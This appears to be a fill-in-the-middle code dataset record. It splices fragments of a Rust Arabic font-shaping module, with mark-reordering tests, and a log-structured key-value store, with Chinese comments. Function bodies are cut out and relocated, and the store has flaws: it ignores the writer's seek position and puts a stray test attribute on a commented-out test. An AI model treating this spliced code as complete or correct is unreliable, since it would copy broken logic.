// Variant of `test_artificial` where U+0656 is replaced with U+0655
// to test the reordering of MCM characters for the ccc = 220 group.
#[test]
fn test_artificial_custom() {
let cs = vec![
'\u{0618}', '\u{0619}', '\u{064E}', '\u{064F}', '\u{0654}', '\u{0658}', '\u{0653}',
'\u{0654}', '\u{0651}', '\u{0655}', '\u{0651}', '\u{065C}', '\u{0655}', '\u{0650}',
];
let cs_exp = vec![
'\u{0655}', '\u{0654}', '\u{0658}', '\u{0651}', '\u{0651}', '\u{0618}', '\u{064E}',
'\u{0619}', '\u{064F}', '\u{0650}', '\u{065C}', '\u{0655}', '\u{0653}', '\u{0654}',
];
test_reorder_marks(&cs, &cs_exp);
}
#[test]
fn test_example1() {
let cs1 = vec!['\u{0627}', '\u{064F}', '\u{0654}'];
let cs1_exp = vec!['\u{0627}', '\u{0654}', '\u{064F}'];
test_reorder_marks(&cs1, &cs1_exp);
let cs2 = vec!['\u{0627}', '\u{064F}', '\u{034F}', '\u{0654}'];
test_reorder_marks(&cs2, &cs2);
let cs3 = vec!['\u{0649}', '\u{0650}', '\u{0655}'];
let cs3_exp = vec!['\u{0649}', '\u{0655}', '\u{0650}'];
test_reorder_marks(&cs3, &cs3_exp);
let cs4 = vec!['\u{0649}', '\u{0650}', '\u{034F}', '\u{0655}'];
test_reorder_marks(&cs4, &cs4);
}
#[test]
fn test_example2a() {
let cs = vec!['\u{0635}', '\u{06DC}', '\u{0652}'];
test_reorder_marks(&cs, &cs);
}
#[test]
fn test_example2b() {
let cs1 = vec!['\u{0647}', '\u{0652}', '\u{06DC}'];
let cs1_exp = vec!['\u{0647}', '\u{06DC}', '\u{0652}'];
test_reorder_marks(&cs1, &cs1_exp);
let cs2 = vec!['\u{0647}', '\u{0652}', '\u{034F}', '\u{06DC}'];
test_reorder_marks(&cs2, &cs2);
}
#[test]
fn test_example3() {
let cs1 = vec!['\u{0640}', '\u{0650}', '\u{0651}', '\u{06E7}'];
// The expected output in https://www.unicode.org/reports/tr53/#Example3
//
// [U+0640, U+0650, U+06E7, U+0651]
//
// is incorrect, in that it fails to account for U+0651 Shadda moving to
// the front of U+0650 Kasra, per step 2a of AMTRA.
//
// U+06E7 Small High Yeh should then move to the front of Shadda per step
// 2b, resulting in:
let cs1_exp = vec!['\u{0640}', '\u{06E7}', '\u{0651}', '\u{0650}'];
test_reorder_marks(&cs1, &cs1_exp);
let cs2 = vec!['\u{0640}', '\u{0650}', '\u{0651}', '\u{034F}', '\u{06E7}'];
// As above, Shadda should move to the front of Kasra, so the expected
// output in https://www.unicode.org/reports/tr53/#Example3
//
// [U+0640, U+0650, U+0651, U+034F, U+06E7]
//
// (i.e. no changes) is also incorrect.
let cs2_exp = vec!['\u{0640}', '\u{0651}', '\u{0650}', '\u{034F}', '\u{06E7}'];
test_reorder_marks(&cs2, &cs2_exp);
}
#[test]
fn test_example4a() {
let cs = vec!['\u{0640}', '\u{0652}', '\u{034F}', '\u{06E8}'];
test_reorder_marks(&cs, &cs);
}
#[test]
fn test_example4b() {
let cs1 = vec!['\u{06C6}', '\u{064F}', '\u{06E8}'];
let cs1_exp = vec!['\u{06C6}', '\u{06E8}', '\u{064F}'];
test_reorder_marks(&cs1, &cs1_exp);
let cs2 = vec!['\u{06C6}', '\u{064F}', '\u{034F}', '\u{06E8}'];
test_reorder_marks(&cs2, &cs2);
}
fn test_reorder_marks(cs: &Vec<char>, cs_exp: &Vec<char>) {
let mut cs_act = cs.clone();
reorder_marks(&mut cs_act);
assert_eq!(cs_exp, &cs_act);
}
}
}
| test_artificial | identifier_name |
arabic.rs | //! Implementation of font shaping for Arabic scripts
//!
//! Code herein follows the specification at:
//! <https://github.com/n8willis/opentype-shaping-documents/blob/master/opentype-shaping-arabic-general.md>
use crate::error::{ParseError, ShapingError};
use crate::gsub::{self, FeatureMask, GlyphData, GlyphOrigin, RawGlyph};
use crate::layout::{GDEFTable, LayoutCache, LayoutTable, GSUB};
use crate::tag;
use crate::unicode::mcc::{
modified_combining_class, sort_by_modified_combining_class, ModifiedCombiningClass,
};
use std::convert::From;
use unicode_joining_type::{get_joining_type, JoiningType};
#[derive(Clone)]
struct ArabicData {
joining_type: JoiningType,
feature_tag: u32,
}
impl GlyphData for ArabicData {
fn merge(data1: ArabicData, _data2: ArabicData) -> ArabicData {
// TODO hold off for future Unicode normalisation changes
data1
}
}
// Arabic glyphs are represented as `RawGlyph` structs with `ArabicData` for its `extra_data`.
type ArabicGlyph = RawGlyph<ArabicData>;
impl ArabicGlyph {
fn is_transparent(&self) -> bool {
self.extra_data.joining_type == JoiningType::Transparent || self.multi_subst_dup
}
fn is_left_joining(&self) -> bool {
self.extra_data.joining_type == JoiningType::LeftJoining
|| self.extra_data.joining_type == JoiningType::DualJoining
|| self.extra_data.joining_type == JoiningType::JoinCausing
}
fn is_right_joining(&self) -> bool {
self.extra_data.joining_type == JoiningType::RightJoining
|| self.extra_data.joining_type == JoiningType::DualJoining
|| self.extra_data.joining_type == JoiningType::JoinCausing
}
fn feature_tag(&self) -> u32 {
self.extra_data.feature_tag
}
fn set_feature_tag(&mut self, feature_tag: u32) |
}
impl From<&RawGlyph<()>> for ArabicGlyph {
fn from(raw_glyph: &RawGlyph<()>) -> ArabicGlyph {
// Since there's no `Char` to work out the `ArabicGlyph`s joining type when the glyph's
// `glyph_origin` is `GlyphOrigin::Direct`, we fallback to `JoiningType::NonJoining` as
// the safest approach
let joining_type = match raw_glyph.glyph_origin {
GlyphOrigin::Char(c) => get_joining_type(c),
GlyphOrigin::Direct => JoiningType::NonJoining,
};
ArabicGlyph {
unicodes: raw_glyph.unicodes.clone(),
glyph_index: raw_glyph.glyph_index,
liga_component_pos: raw_glyph.liga_component_pos,
glyph_origin: raw_glyph.glyph_origin,
small_caps: raw_glyph.small_caps,
multi_subst_dup: raw_glyph.multi_subst_dup,
is_vert_alt: raw_glyph.is_vert_alt,
fake_bold: raw_glyph.fake_bold,
fake_italic: raw_glyph.fake_italic,
variation: raw_glyph.variation,
extra_data: ArabicData {
joining_type,
// For convenience, we loosely follow the spec (`2. Computing letter joining
// states`) here by initialising all `ArabicGlyph`s to `tag::ISOL`
feature_tag: tag::ISOL,
},
}
}
}
impl From<&ArabicGlyph> for RawGlyph<()> {
fn from(arabic_glyph: &ArabicGlyph) -> RawGlyph<()> {
RawGlyph {
unicodes: arabic_glyph.unicodes.clone(),
glyph_index: arabic_glyph.glyph_index,
liga_component_pos: arabic_glyph.liga_component_pos,
glyph_origin: arabic_glyph.glyph_origin,
small_caps: arabic_glyph.small_caps,
multi_subst_dup: arabic_glyph.multi_subst_dup,
is_vert_alt: arabic_glyph.is_vert_alt,
fake_bold: arabic_glyph.fake_bold,
variation: arabic_glyph.variation,
fake_italic: arabic_glyph.fake_italic,
extra_data: (),
}
}
}
pub fn gsub_apply_arabic(
gsub_cache: &LayoutCache<GSUB>,
gsub_table: &LayoutTable<GSUB>,
gdef_table: Option<&GDEFTable>,
script_tag: u32,
lang_tag: Option<u32>,
raw_glyphs: &mut Vec<RawGlyph<()>>,
) -> Result<(), ShapingError> {
match gsub_table.find_script(script_tag)? {
Some(s) => {
if s.find_langsys_or_default(lang_tag)?.is_none() {
return Ok(());
}
}
None => return Ok(()),
}
let arabic_glyphs = &mut raw_glyphs.iter().map(ArabicGlyph::from).collect();
// 1. Compound character composition and decomposition
apply_lookups(
FeatureMask::CCMP,
gsub_cache,
gsub_table,
gdef_table,
script_tag,
lang_tag,
arabic_glyphs,
|_, _| true,
)?;
// 2. Computing letter joining states
{
let mut previous_i = arabic_glyphs
.iter()
.position(|g| !g.is_transparent())
.unwrap_or(0);
for i in (previous_i + 1)..arabic_glyphs.len() {
if arabic_glyphs[i].is_transparent() {
continue;
}
if arabic_glyphs[previous_i].is_left_joining() && arabic_glyphs[i].is_right_joining() {
arabic_glyphs[i].set_feature_tag(tag::FINA);
match arabic_glyphs[previous_i].feature_tag() {
tag::ISOL => arabic_glyphs[previous_i].set_feature_tag(tag::INIT),
tag::FINA => arabic_glyphs[previous_i].set_feature_tag(tag::MEDI),
_ => {}
}
}
previous_i = i;
}
}
// 3. Applying the stch feature
//
// TODO hold off for future generalised solution (including the Syriac Abbreviation Mark)
// 4. Applying the language-form substitution features from GSUB
const LANGUAGE_FEATURES: &[(FeatureMask, bool)] = &[
(FeatureMask::LOCL, true),
(FeatureMask::ISOL, false),
(FeatureMask::FINA, false),
(FeatureMask::MEDI, false),
(FeatureMask::INIT, false),
(FeatureMask::RLIG, true),
(FeatureMask::RCLT, true),
(FeatureMask::CALT, true),
];
for &(feature_mask, is_global) in LANGUAGE_FEATURES {
apply_lookups(
feature_mask,
gsub_cache,
gsub_table,
gdef_table,
script_tag,
lang_tag,
arabic_glyphs,
|g, feature_tag| is_global || g.feature_tag() == feature_tag,
)?;
}
// 5. Applying the typographic-form substitution features from GSUB
//
// Note that we skip `GSUB`'s `DLIG` and `CSWH` features as results would differ from other
// Arabic shapers
const TYPOGRAPHIC_FEATURES: &[FeatureMask] = &[FeatureMask::LIGA, FeatureMask::MSET];
for &feature_mask in TYPOGRAPHIC_FEATURES {
apply_lookups(
feature_mask,
gsub_cache,
gsub_table,
gdef_table,
script_tag,
lang_tag,
arabic_glyphs,
|_, _| true,
)?;
}
// 6. Mark reordering
//
// Handled in the text preprocessing stage.
*raw_glyphs = arabic_glyphs.iter().map(RawGlyph::from).collect();
Ok(())
}
fn apply_lookups(
feature_mask: FeatureMask,
gsub_cache: &LayoutCache<GSUB>,
gsub_table: &LayoutTable<GSUB>,
gdef_table: Option<&GDEFTable>,
script_tag: u32,
lang_tag: Option<u32>,
arabic_glyphs: &mut Vec<ArabicGlyph>,
pred: impl Fn(&ArabicGlyph, u32) -> bool + Copy,
) -> Result<(), ParseError> {
let index = gsub::get_lookups_cache_index(gsub_cache, script_tag, lang_tag, feature_mask)?;
let lookups = &gsub_cache.cached_lookups.borrow()[index];
for &(lookup_index, feature_tag) in lookups {
gsub::gsub_apply_lookup(
gsub_cache,
gsub_table,
gdef_table,
lookup_index,
feature_tag,
None,
arabic_glyphs,
0,
arabic_glyphs.len(),
|g| pred(g, feature_tag),
)?;
}
Ok(())
}
/// Reorder Arabic marks per AMTRA. See: https://www.unicode.org/reports/tr53/.
pub(super) fn reorder_marks(cs: &mut [char]) {
sort_by_modified_combining_class(cs);
for css in
cs.split_mut(|&c| modified_combining_class(c) == ModifiedCombiningClass::NotReordered)
{
reorder_marks_shadda(css);
reorder_marks_other_combining(css, ModifiedCombiningClass::Above);
reorder_marks_other_combining(css, ModifiedCombiningClass::Below);
}
}
fn reorder_marks_shadda(cs: &mut [char]) {
use std::cmp::Ordering;
// 2a. Move any Shadda characters to the beginning of S, where S is a max
// length substring of non-starter characters.
fn comparator(c1: &char, _c2: &char) -> Ordering {
if modified_combining_class(*c1) == ModifiedCombiningClass::CCC33 {
Ordering::Less
} else {
Ordering::Equal
}
}
cs.sort_by(comparator)
}
fn reorder_marks_other_combining(cs: &mut [char], mcc: ModifiedCombiningClass) {
debug_assert!(mcc == ModifiedCombiningClass::Below || mcc == ModifiedCombiningClass::Above);
// Get the start index of a possible sequence of characters with canonical
// combining class equal to `mcc`. (Assumes that `glyphs` is normalised to
// NFD.)
let first = cs.iter().position(|&c| modified_combining_class(c) == mcc);
if let Some(first) = first {
// 2b/2c. If the sequence of characters _begins_ with any MCM characters,
// move the sequence of such characters to the beginning of S.
let count = cs[first..]
.iter()
.take_while(|&&c| is_modifier_combining_mark(c))
.count();
cs[..(first + count)].rotate_right(count);
}
}
fn is_modifier_combining_mark(ch: char) -> bool {
// https://www.unicode.org/reports/tr53/tr53-6.html#MCM
match ch {
| '\u{0654}' // ARABIC HAMZA ABOVE
| '\u{0655}' // ARABIC HAMZA BELOW
| '\u{0658}' // ARABIC MARK NOON GHUNNA
| '\u{06DC}' // ARABIC SMALL HIGH SEEN
| '\u{06E3}' // ARABIC SMALL LOW SEEN
| '\u{06E7}' // ARABIC SMALL HIGH YEH
| '\u{06E8}' // ARABIC SMALL HIGH NOON
| '\u{08CA}' // ARABIC SMALL HIGH FARSI YEH
| '\u{08CB}' // ARABIC SMALL HIGH YEH BARREE WITH TWO DOTS BELOW
| '\u{08CD}' // ARABIC SMALL HIGH ZAH
| '\u{08CE}' // ARABIC LARGE ROUND DOT ABOVE
| '\u{08CF}' // ARABIC LARGE ROUND DOT BELOW
| '\u{08D3}' // ARABIC SMALL LOW WAW
| '\u{08F3}' => true, // ARABIC SMALL HIGH WAW
_ => false,
}
}
#[cfg(test)]
mod tests {
use super::*;
// https://www.unicode.org/reports/tr53/#Demonstrating_AMTRA.
mod reorder_marks {
use super::*;
#[test]
fn test_artificial() {
let cs = vec![
'\u{0618}', '\u{0619}', '\u{064E}', '\u{064F}', '\u{0654}', '\u{0658}', '\u{0653}',
'\u{0654}', '\u{0651}', '\u{0656}', '\u{0651}', '\u{065C}', '\u{0655}', '\u{0650}',
];
let cs_exp = vec![
'\u{0654}', '\u{0658}', '\u{0651}', '\u{0651}', '\u{0618}', '\u{064E}', '\u{0619}',
'\u{064F}', '\u{0650}', '\u{0656}', '\u{065C}', '\u{0655}', '\u{0653}', '\u{0654}',
];
test_reorder_marks(&cs, &cs_exp);
}
// Variant of `test_artificial` where U+0656 is replaced with U+0655
// to test the reordering of MCM characters for the ccc = 220 group.
#[test]
fn test_artificial_custom() {
let cs = vec![
'\u{0618}', '\u{0619}', '\u{064E}', '\u{064F}', '\u{0654}', '\u{0658}', '\u{0653}',
'\u{0654}', '\u{0651}', '\u{0655}', '\u{0651}', '\u{065C}', '\u{0655}', '\u{0650}',
];
let cs_exp = vec![
'\u{0655}', '\u{0654}', '\u{0658}', '\u{0651}', '\u{0651}', '\u{0618}', '\u{064E}',
'\u{0619}', '\u{064F}', '\u{0650}', '\u{065C}', '\u{0655}', '\u{0653}', '\u{0654}',
];
test_reorder_marks(&cs, &cs_exp);
}
#[test]
fn test_example1() {
let cs1 = vec!['\u{0627}', '\u{064F}', '\u{0654}'];
let cs1_exp = vec!['\u{0627}', '\u{0654}', '\u{064F}'];
test_reorder_marks(&cs1, &cs1_exp);
let cs2 = vec!['\u{0627}', '\u{064F}', '\u{034F}', '\u{0654}'];
test_reorder_marks(&cs2, &cs2);
let cs3 = vec!['\u{0649}', '\u{0650}', '\u{0655}'];
let cs3_exp = vec!['\u{0649}', '\u{0655}', '\u{0650}'];
test_reorder_marks(&cs3, &cs3_exp);
let cs4 = vec!['\u{0649}', '\u{0650}', '\u{034F}', '\u{0655}'];
test_reorder_marks(&cs4, &cs4);
}
#[test]
fn test_example2a() {
let cs = vec!['\u{0635}', '\u{06DC}', '\u{0652}'];
test_reorder_marks(&cs, &cs);
}
#[test]
fn test_example2b() {
let cs1 = vec!['\u{0647}', '\u{0652}', '\u{06DC}'];
let cs1_exp = vec!['\u{0647}', '\u{06DC}', '\u{0652}'];
test_reorder_marks(&cs1, &cs1_exp);
let cs2 = vec!['\u{0647}', '\u{0652}', '\u{034F}', '\u{06DC}'];
test_reorder_marks(&cs2, &cs2);
}
#[test]
fn test_example3() {
let cs1 = vec!['\u{0640}', '\u{0650}', '\u{0651}', '\u{06E7}'];
// The expected output in https://www.unicode.org/reports/tr53/#Example3
//
// [U+0640, U+0650, U+06E7, U+0651]
//
// is incorrect, in that it fails to account for U+0651 Shadda moving to
// the front of U+0650 Kasra, per step 2a of AMTRA.
//
// U+06E7 Small High Yeh should then move to the front of Shadda per step
// 2b, resulting in:
let cs1_exp = vec!['\u{0640}', '\u{06E7}', '\u{0651}', '\u{0650}'];
test_reorder_marks(&cs1, &cs1_exp);
let cs2 = vec!['\u{0640}', '\u{0650}', '\u{0651}', '\u{034F}', '\u{06E7}'];
// As above, Shadda should move to the front of Kasra, so the expected
// output in https://www.unicode.org/reports/tr53/#Example3
//
// [U+0640, U+0650, U+0651, U+034F, U+06E7]
//
// (i.e. no changes) is also incorrect.
let cs2_exp = vec!['\u{0640}', '\u{0651}', '\u{0650}', '\u{034F}', '\u{06E7}'];
test_reorder_marks(&cs2, &cs2_exp);
}
#[test]
fn test_example4a() {
let cs = vec!['\u{0640}', '\u{0652}', '\u{034F}', '\u{06E8}'];
test_reorder_marks(&cs, &cs);
}
#[test]
fn test_example4b() {
let cs1 = vec!['\u{06C6}', '\u{064F}', '\u{06E8}'];
let cs1_exp = vec!['\u{06C6}', '\u{06E8}', '\u{064F}'];
test_reorder_marks(&cs1, &cs1_exp);
let cs2 = vec!['\u{06C6}', '\u{064F}', '\u{034F}', '\u{06E8}'];
test_reorder_marks(&cs2, &cs2);
}
fn test_reorder_marks(cs: &Vec<char>, cs_exp: &Vec<char>) {
let mut cs_act = cs.clone();
reorder_marks(&mut cs_act);
assert_eq!(cs_exp, &cs_act);
}
}
}
| {
self.extra_data.feature_tag = feature_tag
} | identifier_body |
kv.rs | //! 通过 [indexmap](https://github.com/bluss/indexmap) 实现简单的 KV 数据库
//! 为了防止 data race,将 IndexMap 用 Arc 进行包装
//! 具体实现可以参考:https://github.com/pingcap/talent-plan/blob/master/courses/rust/projects/project-2/src/kv.rs
use super::util::HandyRwLock;
use crate::{KvsError, Result};
use indexmap::IndexMap;
use serde::{Deserialize, Serialize};
use serde_json::Deserializer;
use std::{
collections::{BTreeMap, HashMap},
ffi::OsStr,
fs::File,
io::{BufReader, BufWriter, Read, Seek, SeekFrom, Write},
ops::Range,
path::{Path, PathBuf},
sync::{Arc, RwLock},
};
/// 键值对存储在日志文件中 todo
struct KVStore {
/// 当将键设置为值时,kvs 将 set 命令写入硬盘中的有序日志中,
/// 然后将该日志对应的指针(文件偏移量)指向键和内容,并存储在内存索引中。
/// 类似地,当删除一个键时,kvs 将 rm 命令写入日志,然后从内存索引中删除该键。
/// 当使用 get 命令检索键的值时,它检索索引,如果找到了,就从对应的日志指针上加载命令,执行命令并返回结果。
///
/// kvs 启动时,就会按从旧到新的顺序从日志中遍历并执行命令,内存索引也会对应的重建。
///
/// 当日志条数达到给定阈值时,kvs 会其压缩为一个新日志,删除冗余日志以回收磁盘空间。
///
/// 注意,kvs 项目既是一个无状态命令行程序,也是一个包含有状态 KVStore 类型的库:
/// 对于 CLI,使用 KVStore 类型将加载索引,执行命令,然后退出;对于库使用,它将加载索引,然后执行多个命令,维护索引状态,直到它被删除。
/// ref: https://github.com/pingcap/talent-plan/blob/master/courses/rust/projects/project-2/README.md#project-spec
path: PathBuf,
// 数字到文件的映射
readers: HashMap<u64, BufReaderWithPos<File>>,
// 当前用于写的日志文件
writer: BufWriterWithPos<File>,
// 存在内存中的索引
index: BTreeMap<String, CommandPos>,
// inner: Arc<RwLock<IndexMap<Vec<u8>, Vec<u8>>>>,
/// 记录当前所写入的文件标号
current_gen: u64,
/// 记录过期/无效的(可被删除的)值的字节数量
uncompacted: u64,
}
#[derive(Debug)]
struct BufWriterWithPos<W: Write + Seek> {
writer: BufWriter<W>,
pos: u64,
}
impl<W: Write + Seek> BufWriterWithPos<W> {
fn new(mut inner: W) -> Result<Self> {
let pos = inner.seek(SeekFrom::Current(0));
Ok(BufWriterWithPos {
writer: BufWriter::new(inner),
pos: 0,
})
}
}
impl<W: Write + Seek> Write for BufWriterWithPos<W> {
fn write(&mut self, buf: &[u8]) -> std::io::Result<usize> {
let len = self.writer.write(buf)?;
self.pos += len as u64;
Ok(len)
}
fn flush(&mut self) -> std::io::Result<()> {
self.writer.flush()
}
}
struct BufReaderWithPos<R: Read + Seek> {
reader: BufReader<R>,
pos: u64,
}
impl<R: Read + Seek> BufReaderWithPos<R> {
fn new(mut inner: R) -> Result<Self> {
let pos = inner.seek(SeekFrom::Current(0))?;
Ok(BufReaderWithPos {
reader: BufReader::new(inner),
pos,
})
}
}
// 将目录中的文件列表按名字进行排序,以便得到有序的日志文件列表
fn sorted_gen_list(path: PathBuf) -> Result<Vec<u64>> {
let mut gen_list: Vec<u64> = std::fs::read_dir(&path)?
.flat_map(|res| -> Result<_> { Ok(res?.path()) })
.filter(|path| path.is_file() && path.extension() == Some("log".as_ref()))
.flat_map(|path| {
path.file_name()
.and_then(OsStr::to_str)
.map(|s| s.trim_end_matches(".log"))
.map(str::parse::<u64>)
})
.flatten()
.collect();
gen_list.sort_unstable();
Ok(gen_list)
}
fn log_path(dir: &Path, gen: u64) -> PathBuf {
dir.join(format!("{}.log", gen))
}
/// 通过文件序号,从对应的文件中读取指令并生成对应的索引加载到内存中(BTreeMap)
fn load(
gen: u64,
reader: &mut BufReaderWithPos<File>,
index: &mut BTreeMap<String, CommandPos>,
) -> Result<u64> {
// 确定从文件的某个位置开始读
let mut pos = reader.seek(SeekFrom::Start(0))?;
let mut stream = Deserializer::from_reader(reader).into_iter::<Command>();
// 通过压缩的手段可节省的字节数
let mut uncompacted = 0;
while let Some(cmd) = stream.next() {
// 匹配到下一条指令所对应的 offset
let new_pos = stream.byte_offset() as u64;
match cmd? {
Command::Set { key, .. } => {
if let Some(old_cmd) = index.insert(key, (gen, pos..new_pos).into()) {
uncompacted += old_cmd.len;
}
}
// 删除
Command::Remove { key } => {
if let Some(old_cmd) = index.remove(&key) {
uncompacted += old_cmd.len;
}
// 为何加上了指令的长度?todo
uncompacted += new_pos - pos;
}
}
pos = new_pos;
}
Ok(uncompacted)
}
#[derive(Debug, Deserialize, Serialize)]
enum Command {
Set { key: String, value: String },
Remove { key: String },
}
/// 定义支持的指令/日志
impl Command {
fn set(key: String, value: String) -> Self {
Command::Set { key, value }
}
fn remove(key: String) -> Self {
Command::Remove { key }
}
}
/// 命令位置
#[derive(Debug)]
struct CommandPos {
/// 日志文件序号
gen: u64,
/// 日志在一个文件中的偏移量
pos: u64,
/// 日志的长度。一个指令就算是一条日志
len: u64,
}
impl From<(u64, Range<u64>)> for CommandPos {
fn from((gen, range): (u64, Range<u64>)) -> Self {
CommandPos {
gen,
pos: range.start,
len: range.end - range.start,
}
}
}
impl<R: Seek + Read> Seek for BufReaderWithPos<R> {
fn seek(&mut self, pos: SeekFrom) -> std::io::Result<u64> {
self.pos = self.reader.seek(pos)?;
Ok(self.pos)
}
}
impl<R: Seek + Read> Read for BufReaderWithPos<R> {
fn read(&mut self, buf: &mut [u8]) -> std::io::Result<usize> {
let len = self.reader.read(buf)?;
self.pos += len as u64;
Ok(len)
}
}
impl KVStore {
/// 基于一个路径启动一个 KvStore 实例。
/// 如果路径不存在,则创建
fn open(path: impl Into<PathBuf>) -> Result<Self> {
// 打开目录,查看目录中的日志文件列表,将其加载进 kvs
let using_path = path.into();
std::fs::create_dir_all(&using_path)?;
let mut readers = HashMap::new();
// 索引以 btree map 的形式存储在内存中
let mut index: BTreeMap<String, CommandPos> = BTreeMap::new();
let gen_list = sorted_gen_list(using_path.clone())?;
let mut uncompacted = 0;
for &gen in &gen_list {
let mut reader = BufReaderWithPos::new(File::open(log_path(&using_path, gen))?)?;
uncompacted += load(gen, &mut reader, &mut index)?;
readers.insert(gen, reader);
}
let current_gen = gen_list.last().unwrap_or(&0) + 1;
let writer = new_log_file(&using_path, current_gen, &mut readers)?;
Ok(KVStore {
path: using_path.clone(),
readers,
writer,
index,
current_gen,
uncompacted,
})
}
/// 设定键值对
/// 1.序列化指令,刷入文件中;2.索引写入内存
fn set(&mut self, k: String, v: String) -> Result<()> {
let cmd = Command::set(k, v);
let pos = self.writer.pos;
serde_json::to_writer(&mut self.writer, &cmd)?;
self.writer.flush()?;
// 索引写入内存 todo
if let Command::Set { key, .. } = cmd {
if let Some(old_cmd) = self
.index
.insert(key, (self.current_gen, pos..self.writer.pos).into())
{
self.uncompacted += old_cmd.len;
}
}
Ok(())
}
/// 读取值
/// 如果key存在则返回值,不存在,返回 None
fn get(&mut self, k: String) -> Result<Option<String>> {
if let Some(cmd_pos) = self.index.get(&k) {
let reader = self
.readers
.get_mut(&cmd_pos.gen)
.expect("Cannot find log reader");
reader.seek(SeekFrom::Start(cmd_pos.pos))?;
let cmd_reader = reader.take(cmd_pos.len);
if let Command::Set { value, .. } = serde_json::from_reader(cmd_reader)? {
Ok(Some(value)) | Err(KvsError::UnsupportCmdType)
}
} else {
Ok(None)
}
}
/// 查询 key 是否存在,如果存在,则记录 cmd 到日志,然后删除文件中的数据,再索引索引
fn delete(&mut self, k: String) -> Result<()> {
if self.index.contains_key(&k) {
let rm_cmd = Command::remove(k.clone());
serde_json::to_writer(&mut self.writer, &rm_cmd)?;
self.writer.flush()?;
if let Command::Remove { key } = rm_cmd {
let old_cmd = self.index.remove(&key).expect("rm key error.");
self.uncompacted += old_cmd.len;
}
Ok(())
} else {
Err(KvsError::KeyNotFound)
}
}
/// 压缩过期的不必要的数据指令
fn compact(&mut self) -> Result<()> {
let compaction_gen = self.current_gen + 1;
self.current_gen += 2;
self.writer = self.new_log_file(self.current_gen)?;
let mut compaction_writer = self.new_log_file(compaction_gen)?;
let mut new_pos = 0;
for cmd_pos in &mut self.index.values_mut() {
let reader = self
.readers
.get_mut(&cmd_pos.gen)
.expect("cann't find log reader");
if reader.pos != cmd_pos.pos {
reader.seek(SeekFrom::Start(cmd_pos.pos))?;
}
let mut entry_reader = reader.take(cmd_pos.len);
let len = std::io::copy(&mut entry_reader, &mut compaction_writer)?;
*cmd_pos = (compaction_gen, new_pos..new_pos + len).into();
new_pos += len;
}
compaction_writer.flush()?;
// 删除过期的日志文件
let stale_gens: Vec<_> = self
.readers
.keys()
.filter(|&&gen| gen < compaction_gen)
.cloned()
.collect();
for stale_gen in stale_gens {
self.readers.remove(&stale_gen);
std::fs::remove_file(log_path(&self.path, stale_gen))?;
}
self.uncompacted = 0;
Ok(())
}
fn new_log_file(&mut self, gen: u64) -> Result<BufWriterWithPos<File>> {
new_log_file(&self.path, gen, &mut self.readers)
}
}
// 读取一个目录下的文件
fn read_dir(path: &str) -> Result<Vec<String>> {
// Rust 实现浏览文件
let dirs: Vec<String> = std::fs::read_dir(path)?
.flat_map(|res| -> Result<_> { Ok(res?.path()) })
.filter(|path| path.is_file())
.flat_map(|path| {
path.file_name()
.and_then(OsStr::to_str)
.map(|s| s.to_string())
})
.collect();
dbg!(&dirs);
Ok(dirs)
}
fn create_dir(path: &str) -> Result<bool> {
std::fs::create_dir_all(path)?;
Ok(true)
}
/// 日志文件的创建
fn new_log_file(
path: &Path,
gen: u64,
readers: &mut HashMap<u64, BufReaderWithPos<File>>,
) -> Result<BufWriterWithPos<File>> {
let path = log_path(&path, gen);
let writer = BufWriterWithPos::new(
std::fs::OpenOptions::new()
.create(true)
.write(true)
.append(true)
.open(&path)?,
)?;
readers.insert(gen, BufReaderWithPos::new(File::open(&path)?)?);
Ok(writer)
}
#[cfg(test)]
mod tests {
use std::{fmt::Result, str::FromStr};
use super::*;
#[test]
fn test_store1() {
let mut st = KVStore::open("./data").expect("kvstore init error.");
let cache_key: String = "org_1001_info".into();
st.set(cache_key.clone(), "hello org".to_string());
assert_eq!(st.get(cache_key.to_string()).unwrap(), Some("hello org".to_string()));
}
#[test]
fn test_load1() {
let mut st = KVStore::open("./data").expect("kvstore init error.");
let cache_key: String = "org_1001_info".to_string();
dbg!(st.get(cache_key.to_string()).unwrap());
}
#[test]
// fn test_store_delete() {
// let mut st = KVStore::new();
// let cache_key: Vec<u8> = "org_1001_info".as_bytes().into();
// st.set(cache_key.clone(), "hello org".as_bytes().into());
// assert_eq!(st.delete(&cache_key), Some("hello org".as_bytes().into()));
// assert_eq!(st.get(&cache_key), None);
// }
#[test]
fn test_sorted_gen_list() {
let res = sorted_gen_list(PathBuf::from("./"));
dbg!(&res);
}
#[test]
fn test_serde() {
// 通过 serde_json 可以实现“流”方式的贪婪匹配对象(反序列化)
let data = b"[10] [1] [2]";
let de = serde_json::Deserializer::from_slice(data);
let mut stream = de.into_iter::<Vec<i32>>();
dbg!(stream.byte_offset()); // 0
dbg!(stream.next()); // Some([10])
dbg!(stream.byte_offset()); // 4
dbg!(stream.next()); // Some([1])
dbg!(stream.byte_offset()); // 8
dbg!(stream.next()); // Some([2])
dbg!(stream.byte_offset()); // 12
}
#[test]
fn test_read_dir() {
let res = read_dir("./");
assert!(res.is_ok());
}
#[test]
fn test_create_dir() {
// 执行时,`./` 指的是项目根目录
let res = create_dir("./test-dir");
assert!(res.is_ok());
}
#[test]
fn test_new_log_file() {
let mut hs: HashMap<u64, BufReaderWithPos<File>> = HashMap::new();
let res = new_log_file(Path::new("./data"), 0, &mut hs);
dbg!(res);
}
#[test]
fn test_command_pos() {
// Into trait 的使用和了解
let c1: CommandPos = (1, 2..17).into();
dbg!(c1);
}
}
/*
>* 资料来源:https://github.com/pingcap/talent-plan/blob/master/courses/rust/projects/project-2/README.md#project-spec
### 部分 1:错误处理
在这个项目中,I/O 错误会导致代码执行失败。因此,在完全实现数据库之前,我们还需要确定一件
至关重要的事:错误处理策略。
Rust 的错误处理很强大,但需要以合适的方式使用多个样板文件,而对于这个项目,failure 库将提供便捷的错误处理工具。
failure 库的指南中描述了几种错误处理模式。
我们选择其中一种策略,然后在库中可以定义自己的错误类型,也可以导入其他 Error。这个策略对应的错误类型将会在项目中的 Result 中使用,
可以使用 `?` 操作符把其他库中的错误类型转换为自己库的错误类型。
这样,为 Result 定义一个含有错误类型的类型别名,编码时就不需要到处输入 Result<T, YourErrorType>,而可以简单的输入 Result。这是一种非常常见的 Rust 模式。
最后,使用 use 语句将这些类型导入到代码中,然后将 main 函数的签名的返回值部分修改为 `Result<()>`。
运行 `cargo check` 可以用编译器检查错误,然后修复这些错误。现在可以先使用 `panic!()` 来结束 `main` 函数,从而通过编译。
在前进之前,先确定好你的错误处理策略。
与之前的项目一样,你可以创建用于占位的数据结构和方法,以便跑通测试用例。现在你定义一个错误类型,这很简单。然后在所有需要编译测试用例的地方添加 panic(`cargo test --no-run`)。
